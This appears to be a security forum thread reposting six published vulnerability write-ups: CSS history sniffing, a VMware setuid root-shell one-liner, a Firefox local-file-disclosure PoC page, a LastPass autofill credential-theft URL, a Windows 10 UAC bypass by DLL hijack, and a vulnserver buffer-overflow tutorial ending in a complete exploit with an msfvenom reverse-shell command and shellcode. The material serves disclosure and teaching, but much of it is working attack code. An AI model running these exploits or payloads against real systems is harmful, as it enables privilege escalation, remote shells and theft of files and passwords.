  20. CSS mix-blend-mode is bad for your browsing history Up until mid-2010, any rogue website could get a good sense of your browsing habits by specifying a distinctive :visited CSS pseudo-class for any links on the page, rendering thousands of interesting URLs off-screen, and then calling the getComputedStyle API to figure out which pages appear in your browser's history. After some deliberation, browser vendors have closed this loophole by disallowing almost all attributes in :visited selectors, spare for the fairly indispensable ability to alter foreground and background colors for such links. The APIs have been also redesigned to prevent the disclosure of this color information via getComputedStyle. This workaround did not fully eliminate the ability to probe your browsing history, but limited it to scenarios where the user can be tricked into unwittingly feeding the style information back to the website one URL at a time. Several fairly convincing attacks have been demonstrated against patched browsers - my own 2013 entry can be found here - but they generally depended on the ability to solicit one click per every URL tested. In other words, the whole thing did not scale particularly well. Or at least, it wasn't supposed to. In 2014, I described a neat trick that exploited normally imperceptible color quantization errors within the browser, amplified by stacking elements hundreds of times, to implement an n-to-2n decoder circuit using just the background-color and opacity properties on overlaid <a href=...> elements to easily probe the browsing history of multiple URLs with a single click. 
To explain the basic principle, imagine wanting to test two links, and dividing the screen into four regions, like so: Region #1 is lit only when both links are not visited (¬ link_a ∧ ¬ link_b), Region #2 is lit only when link A is not visited but link B is visited (¬ link_a ∧ link_b), Region #3 is lit only when link A is visited but link B is not (link_a ∧ ¬ link_b), Region #4 is lit only when both links are visited (link_a ∧ link_b). While the page couldn't directly query the visibility of the segments, we just had to convince the user to click the visible segment once to get the browsing history for both links, for example under the guise of dismissing a pop-up ad. (Of course, the attack could be scaled to far more than just 2 URLs.) This problem was eventually addressed by browser vendors by simply improving the accuracy of color quantization when overlaying HTML elements; while this did not eliminate the risk, it made the attack far more computationally intensive, requiring the evil page to stack millions of elements to get practical results. Game over? Well, not entirely. In the footnote of my 2014 article, I mentioned this: "There is an upcoming CSS feature called mix-blend-mode, which permits non-linear mixing with operators such as multiply, lighten, darken, and a couple more. These operators make Boolean algebra much simpler and if they ship in their current shape, they will remove the need for all the fun with quantization errors, successive overlays, and such. That said, mix-blend-mode is not available in any browser today." As you might have guessed, patience is a virtue! As of mid-2016, mix-blend-mode - a feature to allow advanced compositing of bitmaps, very similar to the layer blending modes available in photo-editing tools such as Photoshop and GIMP - is shipping in Chrome and Firefox. And as it happens, in addition to their intended purpose, these non-linear blending operators permit us to implement arbitrary Boolean algebra. 
For example, to implement AND, all we need to do is use multiply: black (0) x black (0) = black (0) black (0) x white (1) = black (0) white (1) x black (0) = black (0) white (1) x white (1) = white (1) For a practical demo, click here. A single click in that whack-a-mole game will reveal the state of 9 visited links to the JavaScript executing on the page. If this was an actual game and if it continued for a bit longer, probing the state of hundreds or thousands of URLs would not be particularly hard to pull off. Sursa: https://lcamtuf.blogspot.ro/2016/08/css-mix-blend-mode-is-bad-for-keeping.html
  21. VMware - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010) // Source: http://blog.cmpxchg8b.com/2013/08/security-debianisms.html On most modern Linux systems, /bin/sh is provided by bash, which detects that it's being invoked as sh, and attempts to mimic traditional sh. As everyone who works in security quickly learns, bash will drop privileges very early if uid != euid. 488 489 if (running_setuid && privileged_mode == 0) 490 disable_priv_mode (); 491 Where disable_priv_mode is defined as: 1202 void 1203 disable_priv_mode () 1204 { 1205 setuid (current_user.uid); 1206 setgid (current_user.gid); 1207 current_user.euid = current_user.uid; 1208 current_user.egid = current_user.gid; 1209 } Non-Linux systems tend to use pdksh as /bin/sh, which also supports privmode since version 5.0.5: 307 /* Turning off -p? */ 308 if (f == FPRIVILEGED && oldval && !newval) { 309 #ifdef OS2 310 ; 311 #else /* OS2 */ 312 setuid(ksheuid = getuid()); 313 setgid(getgid()); 314 #endif /* OS2 */ 315 } else if (f == FPOSIX && newval) { This is surprisingly effective at mitigating some common vulnerability classes and misconfigurations. Indeed, Chet Ramey (bash author and maintainer) explains that the purpose of this is to prevent "bogus system(3) calls in setuid executables", see section 7 of the bash NOTES file. However, this never really happens on Debian derived systems. Debian (and therefore Ubuntu) will use dash by default (see https://wiki.debian.org/DashAsBinSh), or disable it with this patch if you choose to use bash: http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff A nice example of this failing can be observed in the VMware utilities, which try to invoke lsb_release with popen() to learn about the current execution environment. 
This means you can get a nice easy root shell like this on any Debian/Ubuntu derived system with VMware installed: $ cc -xc - -olsb_release<<<'main(){system("sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount # whoami root It looks like Debian originally decided they didn't want privmode because it broke UUCP (!?). http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586 VMware do list Debian/Ubuntu as supported host platforms though, so they have published a fix for this issue today. If you care about this and can't wait for the patch, you can temporarily remove the setuid bit from vmware-mount like this: # chmod u-s /usr/bin/vmware-mount Note that it is almost impossible to use popen() or system() safely in a setuid program without privmode, even if you specify the full path. This is a fun example from back in 2005, but there are lots more cases. In conclusion, too bad if an otherwise unexploitable bug becomes exploitable, that's the price you pay for high quality uucp support in 2013 ;-) P.S. If you don't know what uucp is, you can read more about it on fidonet or at my gopher site. P.P.S. I sent the dash maintainers a patch today, but I'm not sure if they're interested. Sursa: https://www.exploit-db.com/exploits/40169/
  22. FireFox Local File Disclosure and Same Origin Policy bypass It's possible to read external websites and any file on a victims computer using the 'Save Page As' functionality on Firefox. This is reliant on Firefox's allowance of reading files in the same directory in the file: URI scheme. Which was deemed 'by design'. You can do this with Google Chrome but you can't read the saved files, so Google did not consider this a bug. The PoC The following is the original PoC reported: <html> <head> <title>POC</title> <link rel="stylesheet" href="file:///C://" /> <link rel="stylesheet" href="https://www.facebook.com/" /> </head> <body> <textarea style="width: 434px; height: 310px;" id="facebook"></textarea> <textarea style="width: 434px; height: 310px;" id="files"></textarea> <script type="application/javascript"> var doQ = (q) => { //Simple XMLHttpRequest try { var oReq = new XMLHttpRequest(); oReq.addEventListener("load", function(e) { console.dir(e) }); oReq.open("GET", q, false); oReq.send(); } catch (e) { alert('File not found or restricted.') }; return oReq.response; }; if (location.protocol == 'file:') { facebook.value = doQ('./POC_files/a.htm'); files.value = doQ('./POC_files/a'); } else { alert('Please hit CTRL+S and save this page first then open it locally.'); } </script> </body> </html> Basically, when there is a reference to any website or local file using something like a link tag, initially Firefox blocks these, however, when a user saves the webpage, the 'Save webpage as' part does not do any checks on whether the files being downloaded are legitimate. After the files are downloaded, the folder they are in are predictable (same as title + _files) and so we are able to read a victims local files and external websites with full credentials. Result Screenshot Sursa: http://leucosite.com/FireFox-LFD-and-SOP-Bypass/
  23. How I made LastPass give me all your passwords 2016.07.27 labsdetectify Cross Site ScriptingLastpassMathias KarlssonXSS Note: This issue has already been resolved and pushed to the Lastpass users. Stealing all your passwords by just visiting a webpage. Sounds too bad to be true? That’s what I thought too before I decided to check out the security of the LastPass browser extension. For those who don’t know, LastPass is one of the world’s most popular password managers. I started by noticing that the extension added some HTML code to every page I visited, so I decided to dig into how that worked. A few cups of coffee later, I found something that looked really, really bad. The issue The bug that allowed me to extract passwords was found in the autofill functionality. First, the code parsed the URL to figure out which domain the browser was currently at, then it filled any login forms with the stored credentials. However, the URL parsing code was flawed (bug in URL parsing? shocker!). This was the code (lpParseUri function, un-minified): var fixedURL = URL.match(/^(.*:\/\/[^\/]+\/.*)@/); fixedURL && (url = url.substring(0, fixedURL[1].length) + url.substring(fixedURL[1].length).replace(/@/g, "%40")); By browsing this URL: http://avlidienbrunn.se/@twitter.com/@hehe.php the browser would treat the current domain as avlidienbrunn.se while the extension would treat it as twitter.com. Since the code only URL encodes the last occurence of @, the actual domain is treated as the username portion of the URL. Too bad to be true? Below you see that the extension would fill my form with the stored credentials for twitter.com. After that I could simply go through other commonly used sites and extract credentials for those too. I reported this to LastPass through their responsible disclosure page and the report was handled very professionally. The fix was pushed in less than a day(!), and they even awarded me with a bug bounty of $1,000. Are passwords managers bad? 
Should we stop using password managers? No. They are still much better than the alternative (password reuse). Although, taking a second to disable autofill functionality is a good move because this isn’t the first autofill bug we’ve seen, and I doubt it will be the last. Also, this would not work if multi factor authentication was on, so you should probably enable that as well. Updates Update #1 2016.07.28: There has been a lot of comments regarding the reward Mathias received from Lastpass. At the time Mathias submitted this they didn’t have a bug bounty so he was more than satisfied with $1,000. Update #2 2016.07.28: Lastpass have made a comment regarding Mathias finding on their blog. Sursa: https://labs.detectify.com/2016/07/27/how-i-made-lastpass-give-me-all-your-passwords/
  24. Bypassing UAC on Windows 10 using Disk Cleanup Matt Graeber (@mattifestation) and I recently dug into Windows 10, and discovered a rather interesting method of bypassing User Account Control (if you aren’t familiar with UAC you can read more about it here). Currently, there are a couple of public UAC bypass techniques, most of which require a privileged file copy using the IFileOperation COM object or WUSA extraction to take advantage of a DLL hijack. You can dig into some of the public bypasses here (by @hfiref0x). The technique covered in this post differs from the other methods and provides a useful alternative as it does not rely on a privileged file copy or any code injection. A common technique used to investigate loading behavior on Windows is to use SysInternals Process Monitor to analyze how a process behaves when executed. After investigating some default Scheduled Tasks that exist on Windows 10 and their corresponding actions, we found that a scheduled task named “SilentCleanup” is configured on stock Windows 10 installations to be launchable by unprivileged users but to run with elevated/high integrity privileges. To find this, we simply went through each task and inspected the security options for “Run with Highest Privileges” to be checked with a non-elevated User Account (such as ‘Users’). Taking a closer look with procmon, we found that the actual process started by the scheduled task, cleanmgr.exe, auto-elevates due to “execute with highest privileges” being set in the task configuration. Let’s dive in a bit more. When cleanmgr.exe executes, it creates a new folder with the name of a GUID in “C:\Users\<username>\AppData\Local\Temp”. 
Once cleanmgr.exe creates the temporary folder, it then copies multiple DLLs along with “dismhost.exe” into the new folder: After copying DismHost.exe and its DLLs to “C:\Users\<username>\AppData\Local\Temp\<guid>”, cleanmgr.exe then starts “dismhost.exe” out of the newly created path as a high integrity process: Since dismhost.exe launches out of “C:\Users\<username>\AppData\Local\Temp\<guid>”, it begins to load DLLs out of the same folder in a certain order: Because the current medium integrity user has write access to the user’s %TEMP% directory, it is possible to hijack a DLL loaded by dismhost.exe and obtain code execution in a high integrity process. This is commonly known as a “BypassUAC” attack. Since this particular situation is a race condition, we have to replace the target DLL before dismhost.exe loads it. We examined the entire process more closely and determined that “LogProvider.dll” is the last DLL loaded by dismhost.exe, giving us the best chance for a hijack opportunity. With this information, we can use a WMI event to monitor for the creation of “C:\Users\<username>\AppData\Local\Temp\<guid>” and then assign that WMI event an action of hijacking “LogProvider.dll” by copying our “malicious” DLL into “C:\Users\<username>\AppData\Local\Temp\<guid>” and naming it “LogProvider.dll”. Since this action happens before dismhost.exe loads it, it will load our DLL instead of the intended one. Once dismhost.exe loads the DLL, it will load as high integrity, allowing us to bypass User Account Control and obtain code execution as a high integrity process. After additional testing, this technique does not apply to standard user accounts as cleanmgr.exe does not extract any files to %TEMP%. When executed as a standard user in low or medium integrity, the task runs as medium integrity and never elevates past that. 
Matt Graeber (@mattifestation) wrote an excellent PoC PowerShell script that will register a WMI event to monitor for the creation of the GUID folder by cleanmgr.exe and once detected, it will take the specified DLL and copy it to the GUID folder with the name of “LogProvider.dll”. Once dismhost.exe goes to load “LogProvider.dll”, it will be our malicious DLL instead of the legitimate one, thus bypassing UAC and giving us code execution in High Integrity context. You can find the script here: https://gist.github.com/mattifestation/b4072a066574caccfa07fcf723952d54 To test this, you simply need the PoC script and a DLL with a standard export of dllmain. For testing, you can either create your own DLL or use a simple MessageBox one located here: https://github.com/enigma0x3/MessageBox This technique differs from the other public techniques by having a few benefits that can be handy: This technique does not require any process injection, meaning the attack won’t get flagged by security solutions that monitor for this type of behavior. There is no privileged file copy required. Most UAC bypasses require some sort of privileged file copy in order to get a malicious DLL into a secure location to setup a DLL hijack. Since the scheduled task copies the required stuff to %TEMP%, no privileged file copy is required. This technique cleans up after itself. After the scheduled task is done (and loads our malicious DLL), the task deletes the GUID folder (and files) that it created in %TEMP%. This technique works with the UAC level being set at its highest setting (“Always Notify”) since the task is set to run with “Highest Privileges”. The majority of the public UAC bypasses rely on the IFileOperation COM object to perform a privileged file copy. IFileOperation honors the “Always Notify” UAC setting and prompts when set, causing the privileged file copy to fail: This was disclosed to Microsoft Security Response Center (MSRC) on 07/20/2016. 
As expected, they responded by noting that UAC isn’t a security boundary, so this doesn’t classify as a security vulnerability, as stated here. While not a vulnerability, it does allow an attacker an alternate method to move to high integrity that differs from previous bypasses and introduces one more location or chokepoint that must be monitored to observe attacker behavior. This particular technique can be remediated or fixed by disabling the task or removing the requirement for running with highest privileges. Further, if you would like to monitor for this attack, you could utilize methods/signatures to look for new WMI events as it is required to monitor for new folder creation for this attack to succeed. Combining this with App/DLL whitelisting and monitoring for abnormal modules being loaded (e.g. Sysmon event ID 7) would also limit the success of such an attack. *Update: As always, users should follow best practices and not use an administrative account for daily computer usage. Sursa: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/
  25. Buffer Overflows and you! Posted on July 22, 2016 by T0w3ntum in Exploit Development I wanted to do an article on Buffer Overflows, there are many articles on Buffer Overflows, but this one is mine! I’m going to take it easy on the first go and do a simple Stack Based buffer overflow. So let’s get started. For this I’ll be using vulnserver. It’s an intentionally vulnerable binary for you to practice on. I did this from my Windows 10 machine, but you are free to use whatever flavor of Windows you want. Simply download the files, unzip, and run it. Now remember, this is intentionally vulnerable…So maybe turn off your internet or run it in a VM. Fuzzing So let’s load up immunity and see what happens when we throw a bunch of crap at it. I’ll be targeting the TRUN function of vulnserver. First we need some fuzzer code: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 #!/user/bin/python import socket import sys buffer=["A"] counter=100 while len(buffer) <= 100: buffer.append("A"*counter) counter=counter+200 for string in buffer: print "[+] Fuzzing vulnserver with %s bytes" % len(string) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect(('192.168.1.8',6666)) s.recv(1024) s.send( sys.argv[1]+" ."+string) #Note the "." as it's important. data = s.recv(1024) print data s.send('EXIT\r\n') s.close() When we run this, we get a crash around 2100 bytes. We can easily verify that the EIP is overwritten by looking at the CPU Registers in immunity. Note the EIP is now full of 41414141 or AAAA. This means that our long string of A’s has overwritten the EIP register and broke the flow of the application as 41414141 is not a valid address. Gaining Control Now that we know roughly how much data we need to throw at it to crash it, we need to find the exact point where the EIP is overwritten. This is easily done by generating a unique pattern 2100 bytes in length and crashing the application again. 
Luckily, the Metasploit framework comes with a handy tool for doing just that. 1 /usr/share/metasploit-framework/tools/exploit/pattern_create.rb 2100 This will create a unique pattern that we can crash the application with. Let’s update our code with the new string. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 #!/user/bin/python import socket buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0C
d1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9' print "[+] Sending buffer. Check EIP after crash." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect(('192.168.1.8',6666)) s.recv(1024) s.send('TRUN .'+buffer) data = s.recv(1024) print data s.send('EXIT\r\n') s.close() When we fire this off and check the EIP we’ll see a new unique string there. If we run that through pattern_offset we can find the exact offset before we overwrite the EIP register. In this case it’s at 2006. 1 2 /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 396F4338 [*] Exact match at offset 2006 Let’s verify the offset by overwriting EIP with our own bit of code. I like to use 0xdeadbeef because why not? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 #!/user/bin/python import socket from struct import * buffer = 'A' * 2006 buffer += pack('<L', 0xdeadbeef) print "[+] Sending buffer. Check EIP after crash." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect(('192.168.1.8',6666)) s.recv(1024) s.send('TRUN .'+buffer) data = s.recv(1024) print data s.send('EXIT\r\n') s.close() After running this, we can see that we have successfully overwritten EIP with DEADBEEF. SWEEEET! We now control EIP. This means we control the flow of the application. The next step is to see how much room we have for our shellcode. We could put it in the initial string of A’s before the crash, but let’s see how much further past the EIP we can write to the stack. 
Adding in Shellcode As I mentioned, we need to find some room for our shellcode so let’s update our code to squeeze in some C’s. I’ll start with 400 bytes of C’s as that should be enough for a simple reverse shell. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 #!/user/bin/python import socket from struct import * buffer = 'A' * 2006 buffer += pack('<L', 0xdeadbeef) buffer += 'C' * 400 print "[+] Sending buffer. Check EIP after crash." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect(('192.168.1.8',6666)) s.recv(1024) s.send('TRUN .'+buffer) data = s.recv(1024) print data s.send('EXIT\r\n') s.close() After firing this off and looking at the dump we can see a couple of things. First is that all of our C’s seem to fit and second, they start right at the ESP. The image below, with its crappy highlighting, shows the ESP. You can verify this by looking at the ESP value in the registers. This is good for a couple of reasons. We know we have enough room for our shellcode, and we know that all we need to do is jump to the ESP to execute our shellcode. What do I mean by this? Well, since we control EIP, we can tell the application to go wherever we want. So what we need to do is tell it to go to an instruction that says jmp esp. This will cause the application to go to the top of the stack and start executing our shellcode. But first, let’s find out what characters the application can and cannot handle. Finding Bad Characters In order to have successful execution, we need to make sure the application properly reads all of our characters. To do this, we need to send in a string of bad characters and then check the stack dump. If there is a break in the string, we can assume there is a bad character, remove it, and send the string again. Note that the test string deliberately starts at 0x01: the null byte 0x00 terminates C strings and is almost always a bad character, which is why it is excluded here and passed to the payload generator as bad later on. Fortunately for us there didn’t seem to be any other bad characters in this application. 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 #!/user/bin/python import socket from struct import * badchar = "" badchar += "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" badchar += "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f" badchar += "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" badchar += "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" badchar += "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" badchar += "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" badchar += "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" badchar += "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" buffer = 'A' * 2006 buffer += pack('<L', 0xdeadbeef) buffer += badchar print "[+] Sending buffer. Check EIP after crash." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect(('192.168.1.8',6666)) s.recv(1024) s.send('TRUN .'+buffer) data = s.recv(1024) print data s.send('EXIT\r\n') s.close() Finding our Return Address So how do we go about finding a jmp esp instruction call? With the power of Mona that’s how! First we need to find a module loaded in the application that doesn’t have any of the fancy memory protections. In this case, I’ll use essfunc.dll, so let’s see if there is a jmp esp call within that module. We’ll just use the top address as our return. 
Finalizing the Exploit Alright, we’ve done all the leg work. Now let’s finalize this exploit and get ourselves a shell! I’ll use msfvenom to generate some shellcode for us. 1 msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.21 LPORT=4444 --smallest -f python -v payload -b '\x00' We’ll use the shell_reverse_tcp as it’s none-staged and relatively small. Note I’m also declaring the NULL character, 0x00, as a bad character. So let’s update our script. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 #!/user/bin/python import socket from struct import * ret = pack('<L', 0x625011AF) payload = "" payload += "\x33\xc9\x66\xb9\x43\x01\xe8\xff\xff\xff\xff\xc1" payload += "\x5e\x30\x4c\x0e\x07\xe2\xfa\xfd\xea\x81\x04\x05" payload += "\x06\x67\x81\xec\x3b\xcb\x68\x86\x5e\x3f\x9b\x43" payload += "\x1e\x98\x46\x01\x9d\x65\x30\x16\xad\x51\x3a\x2c" payload += "\xe1\xb3\x1c\x40\x5e\x21\x08\x05\xe7\xe8\x25\x28" payload += "\xed\xc9\xde\x7f\x79\xa4\x62\x21\xb9\x79\x08\xbe" payload += "\x7a\x26\x40\xda\x72\x3a\xed\x6c\xb5\x66\x60\x40" payload += "\x91\xc8\x0d\x5d\xa5\x7d\x01\xc2\x7e\xc0\x4d\x9b" payload += "\x7f\xb0\xfc\x90\x9d\x5e\x55\x92\x6e\xb7\x2d\xaf" payload += "\x59\x26\xa4\x66\x23\x7b\x15\x85\x3a\xe8\x3c\x41" payload += "\x67\xb4\x0e\xe2\x66\x20\xe7\x35\x72\x6e\xa3\xfa" payload += "\x76\xf8\x75\xa5\xff\x33\x5c\x5d\x21\x20\x1d\x24" payload += "\x24\x2e\x7f\x61\xdd\xdc\xde\x0e\x94\x6c\x05\xd4" payload += "\xe2\xb8\xbe\x8d\x8e\xe7\xe7\xe2\xa0\xcc\xc0\xfd" payload += "\xda\xe0\xbe\x9e\x65\x4e\x24\x0d\x9f\x9f\xa0\x88" payload += "\x66\xf7\xf4\xcd\x8f\x27\xc3\xa9\x55\x7e\xfc\xfd" payload += "\xfe\xff\xf0\xe1\xf2\xe3\xdc\x5f\xb9\x68\x58\x46" payload += "\x6f\x2c\xd6\xb8\xd6\x7f\x68\xc0\xe7\xab\xc6\xc5" payload += "\xd7\x9b\x41\x2f\xa0\xdb\x9a\x9a\xa6\x56\x75\xa5" payload += "\xb3\x2c\x01\x50\x16\xa3\xd4\x26\x94\xd3\xa9\x31" payload += 
"\xb6\x2f\x55\x43\xb4\x1c\x31\x8d\x85\x8a\x8c\xe9" payload += "\x63\x08\xbb\xba\xb9\xde\x06\x9b\xe0\xaa\xa2\x17" payload += "\x0b\x91\x3f\xbd\xde\xc7\xfd\xfc\x73\xbb\x24\x11" payload += "\xc4\x03\x40\x51\x56\x51\x5e\x5f\x4c\x5d\x42\x5b" payload += "\x58\x5c\x46\x79\x6b\xdf\x2b\x93\xe9\xc2\x91\xf9" payload += "\x54\x4d\x5a\xe2\x2e\x77\x28\xa6\x3f\x43\xdb\xf0" payload += "\x9d\xd7\x9d\x8b\x7c\x43\x8a\xb8\x93\xb2\xcf\xe4" payload += "\x0e\x35\x48\x3f\xb6\xcc\xd8\x4c\x3f\x80\x7b\x2e" payload += "\x4c\x50\x2a\x41\x11\xbc\x91" buffer = 'A' * 2006 buffer += ret buffer += payload print "[+] Sending buffer. Check EIP after crash." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect(('192.168.1.8',6666)) s.recv(1024) s.send('TRUN .'+buffer) data = s.recv(1024) print data s.send('EXIT\r\n') s.close() And that’s it. Once we set up our listener and fire off the code we should have a shiny new shell! Sursa: https://t0w3ntum.wordpress.com/2016/07/22/buffer-overflows-and-you/